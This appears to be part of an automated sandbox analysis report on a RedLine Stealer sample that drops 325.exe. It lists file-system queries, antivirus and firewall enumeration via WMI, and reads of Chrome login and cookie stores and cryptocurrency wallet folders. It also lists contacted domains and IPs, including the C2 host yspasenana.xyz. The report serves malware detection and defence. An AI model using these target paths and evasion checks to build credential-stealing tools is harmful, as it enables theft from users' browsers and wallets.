Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C22A8 GetLocalTime, 0_2_00000001400C22A8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW, 0_2_000000014004F760
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW, 0_2_0000000140001270
Source: C:\Users\user\AppData\Roaming\325.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: kS2dqbsDwD.exe Binary or memory string: WIN_XP
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
Source: kS2dqbsDwD.exe Binary or memory string: WIN_VISTA
Source: kS2dqbsDwD.exe Binary or memory string: WIN_7
Source: kS2dqbsDwD.exe Binary or memory string: WIN_8
Source: kS2dqbsDwD.exe Binary or memory string: WIN_8.1
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize, 0_2_0000000140017E10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain, 0_2_0000000140058440
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain, 0_2_0000000140018920
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452457 Sample: kS2dqbsDwD Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected RedLine Stealer 2->39 41 5 other signatures 2->41 7 kS2dqbsDwD.exe 14 2->7         started        process3 dnsIp4 21 iplogger.org 88.99.66.31, 443, 49711 HETZNER-ASDE Germany 7->21 23 is.gd 104.25.234.53, 443, 49712 CLOUDFLARENETUS United States 7->23 25 4 other IPs or domains 7->25 19 C:\Users\user\AppData\Roaming\325.exe, PE32 7->19 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 May check the online IP address of the machine 7->45 47 Sample or dropped binary is a compiled AutoHotkey binary 7->47 12 325.exe 3 7->12         started        file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 12->49 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->51 53 Performs DNS queries to domains with low reputation 12->53 55 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->55 15 325.exe 15 30 12->15         started        process9 dnsIp10 27 yspasenana.xyz 212.224.105.105, 49739, 49741, 49742 DE-FIRSTCOLOwwwfirst-colonetDE Germany 15->27 29 api.ip.sb 15->29 31 Tries to harvest and steal browser information (history, passwords, etc) 15->31 33 Tries to steal Crypto Currency Wallets 15->33 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
212.224.105.105
 yspasenana.xyz Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
104.192.141.1
 bitbucket.org United States
16509 AMAZON-02US false
104.25.234.53
 is.gd United States
13335 CLOUDFLARENETUS false
88.99.66.31
 iplogger.org Germany
24940 HETZNER-ASDE false
52.217.201.169
 s3-w.us-east-1.amazonaws.com United States
16509 AMAZON-02US false

Contacted Domains

Name IP Active
s3-w.us-east-1.amazonaws.com 52.217.201.169 true
yspasenana.xyz 212.224.105.105 true
bitbucket.org 104.192.141.1 true
iplogger.org 88.99.66.31 true
is.gd 104.25.234.53 true
bbuseruploads.s3.amazonaws.com unknown unknown
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://yspasenana.xyz/ false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown